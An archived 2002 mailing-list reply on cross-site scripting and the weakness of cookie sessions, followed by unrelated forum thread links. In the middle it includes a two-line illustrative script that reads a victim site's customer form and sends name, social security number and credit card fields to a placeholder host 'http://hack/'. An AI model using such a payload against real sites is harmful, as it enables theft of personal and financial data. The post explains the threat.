Re: CSS, CSS & let me give you some more CSS

From: Andre Mariën (andre.marien@ubizen.com)
Date: 02/04/02 

Date: Mon, 04 Feb 2002 11:06:49 +0100
From: Andre Mariën <andre.marien@ubizen.com>

E M wrote:
>
> I think we are getting away from the original topic, CSS and how it effects
> you.
>
> Basically the general agreement is that cookie stealing via embedded code is
> the most dangerous use for CSS and the most common.
>
> This brings me to the point that cookie based authentication is unsafe
> inherently and as far as I can tell not something that security minded
> developers would even consider.

To be clear: cookies are keep-alive session IDs, not real
authenticators.
Their inherent security is similar too uid/pw: replayable, sniffable
string,
with a more limited life time.

> So the jist is that CSS is mainly used to exploit older web app's that use
> cookie based authentication (Prime example older versions of Yet another
> Bulletin Board (Yabb). Not to say it can't be used for other things, just
> that from what I'm seeing... its not.

Suppose someone runs this script:

w = open('form.htm','form.htm');
url='http://hack/'+encode(w.f.name+w.f.ssn+w.f.birth+w.f.cc);

where form is a customer detail page update form from
the site under attack.
The url that is produced picks up very nice information
(social security number, credit card; whatever nice stuff is there)

It does not matter how you secured the site, as long as it does
not require human intervention anymore (!) at the time of attack.
To spell it out: cookies, basic authentication, SSL3: who cares?

Regardless of the fact that one does not see how things can be abused,
the mere fact that someone can do things he shouldn't have been able to
do,
should be enough to protect against it.

Relevant Pages

  • Re: authentication cookie vs session cookie
    ... Improving security in ASP.NET form authentication is a hot issue. ... information on the security of cookie authentication and on combining forms authentication with role-based URL ... session variables as it relies on the session cookie that ASP.NET sends to ...
    (microsoft.public.dotnet.framework.aspnet.security)
  • RE: OWA Security
    ... when you run the CEICW and enable "Allow access OWA ... Web Site to be configured for Forms Based Authentication (FBA, ... virtual roots /exchange and /exchweb will be configured to use cookie ... you don't need to do more security for OWA. ...
    (microsoft.public.windows.server.sbs)
  • On choosing ASPX authentication cookie name
    ... Looking at the fields for configuring a web site's security and I'm using Forms authentication. ... Saw the part about assigning a cookie name. ... I assume this is the cookie that gets set when a person logs in. ...
    (microsoft.public.dotnet.framework.aspnet)
  • RE: Forms authentication cookie handling question (C#)
    ... I also replaced all of my ticket authentication code with the ... // Username and or password not found in our database... ... LoginControl's default code logic to generate authentication cookie. ...
    (microsoft.public.dotnet.framework.aspnet)
  • RE: Forms Authentication
    ... The DNS entry for my domain was not set corrretly, ... This should have overcome the cookie ... authentication ticketis not correctly set to the domain your ... Microsoft MSDN Online Support Lead ...
    (microsoft.public.dotnet.framework.aspnet)